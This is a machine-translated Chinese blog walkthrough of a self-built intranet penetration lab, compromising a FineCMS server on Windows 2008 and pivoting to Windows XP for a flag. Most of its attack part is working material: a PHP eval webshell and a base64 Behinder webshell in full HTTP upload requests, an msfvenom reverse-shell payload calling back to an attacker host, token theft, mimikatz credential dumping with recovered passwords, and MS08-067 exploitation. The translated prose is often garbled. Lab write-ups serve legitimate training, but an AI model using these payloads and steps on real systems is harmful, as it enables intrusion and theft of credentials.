当前位置：网站首页>Self built shooting range 2022

This shooting range is a simple intranet penetration shooting range . You need to get it first win2008 Server permissions , Then penetrate the intranet and win WinXP,win2008 Not on flag,flag stay WinXP On . A comprehensive test of many knowledge , Protection software is not used yet , It belongs to a relatively basic shooting range .

The main configuration is as follows ：

System	ip Address
kali 2020	192.168.1.106
win10 （ This machine ）	192.168.1.104
win2008	192.168.1.107
winxp	10.101.10.133

The range link is as follows ：

link ：https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw

Extraction code ：ehs8

ps：win10 and kali Self provided

Sharing too much fear of being blocked , So now it's 10 Quota , There are not many people who should fight in the shooting range .

Two 、 Take down web The server

2.1 Upload and take any file shell

nmap 192.168.1.107 -p 8069 -sV

8069 The port is web port , visit http://192.168.1.107:8069/ Found to be finecms.

Baidu search finecms Loophole

(15 Bar message ) finecms Upload any file in the foreground ——getshell_W The little elder brother -CSDN Blog _ Upload any file getshell

Front desk registration

First upload a normal avatar , Find the way

 <?php @eval($_POST['a']); ?>  #  A Hu Trojan horse base64 encryption 
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=

Construct the packet as follows

POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d


tx=data%3Aimage%2Fphp%3Bbase64%2CIDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=

The above one can be connected with Chinese kitchen knife or Chinese ant sword .

Here I use ice scorpion .base64 Encryption is the horse of ice scorpion .

POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d


tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==%3D

Here you can upload msf Generated exe.

msfvenom -p  windows/meterpreter/reverse_tcp  lhost=192.168.1.106 lport=4444 -f exe -o web.exe

But we all use ice scorpions , Direct rebound shell.

2.2 rebound meterpreter

Use ice scorpion to bounce meterpreter

2.3 Raise the right

migrate pid  # Migration process authorization 
post/multi/recon/local_exploit_suggester #msf Look for options for raising rights 
post/windows/gather/enum_patches  
# Find a patch and then use the rights lifting web page 
http://bugs.hacking8.com/tiquan/  # Supporting web page for power lifting

Use rotten potatoes with msf Raise the right

execute -HC -f rottenpotato.exe  # Silently execute rotten potatoes   Generate system Token for permission 
use incognito              # Use incognito modular 
list_tokens -u              # List all tokens 
impersonate_token "NT AUTHORITY\\SYSTEM"  # Stealing tokens

2.4 Grab hash

Use here msf Self contained mimikatz and hashdump have a problem , So I uploaded a github Download the mimikatz

Use the following command to obtain the plaintext password .

cd C:\Users\Administrator\Desktop
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > password.txt

account number	password
administrator	hacker1961

3、 ... and 、 Intranet penetration

3.1 information gathering

adopt ipconfig and arp_scanner Detect the Internet ip

The intranet segment is 10.101.10.0/24

Discover intranet hosts 10.101.10.133

run autoroute -s 10.101.10.0/24   Add route 
run autoroute -p    Confirm to add route

3.2 Configure agent

use auxiliary/server/socks_proxy 
 The point to note here is that the version is 4a
set version 4a
run
vim /etc/proxychains.conf  edit proxychain Configuration file for

3.3 nmap Scan port

proxychains nmap -Pn -sT 10.101.10.133 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984 ,6379,7001,7002,9200, 9300 ,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

3.4 Exploit

80 There's nothing on the port , notice 445 The port can be opened .

use auxiliary/scanner/smb/smb_version # scanning smb edition 
search ms08_067  Search for 08067 Loophole , Very classic vulnerability 
set rhost 10.101.10.133
run

smb Judgment is winxp sp3 So use ms08_067 Hit it .

There is no need to raise the right here , It's already system jurisdiction .

get flag C:\Documents and Settings\Administrator\Desktop

cd C:\Documents and Settings\Administrator\Desktop
type flag.txt

flag{aGFwcHkgbmV3IHllYXIh}

flag Decryption is

echo "aGFwcHkgbmV3IHllYXIh" | base64 -d

3.5 Remote login

obtain hash

Or use msf Self contained mimikatz

load kiwi   load mimikatz
creds_all   Grab the password

account number	password
administrator	123456

then 3389 Sign in

proxychains rdesktop 10.101.10.133

Four 、 Add ： Raise the right

Here, the author sorted out some simple knowledge of raising rights while shooting at the shooting range .

4.1 Local rights

NSudoLC Raise the right

# Project description 
https://nsudo.m2team.org/zh-hans/
# Project address 
https:://github.com/Thdub/NSudo_Installer

Use x64 Of NSudoLC.exe,NSudoLG.exe It is a graphical interface , The latest version of the rights can be raised locally win10.

NSudoLC.exe -U:S -P:E web.exe

You need administrator permission here , Can rise to system jurisdiction

BitsArbitraryFileMoveExploit.exe Raise the right

This is 2020 year 8 One of the moonrises bendi There are loopholes in rights raising , There are many versions affected , Including the latest win10 It is a relatively recent loophole for raising rights . But you can only double-click to execute , One will pop up system Permission window .

4.2 Remote right raising

this paper 2.3 With rotten potatoes in msf Raise the right , Here is another way to raise rights .

Upload cve-2019-1458.exe

And then execute cve-2019-1458.exe web.exe

Bounce back system The powers of the meterpreter

Raising rights can be divided into several categories ：

Use system loopholes to claim rights （ It can be divided into local right lifting and remote right lifting ）
Migration process authorization （msf Of migrate）
bypassuac Raise the right （msf Integrated modules ）
Stealing token rights （ Rotten potatoes ）
Use the database to raise rights （ Using the database root jurisdiction , You can get the highest permission ）

Links used in this article ：

Kernelhub/CVE-2020-0787 at master · iNarcissuss/Kernelhub · GitHub

Kernelhub/cve-2019-1458.exe at master · Ascotbe/Kernelhub · GitHub

The author of this article ：

原网站

版权声明
本文为[Syche]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/02/202202140522092075.html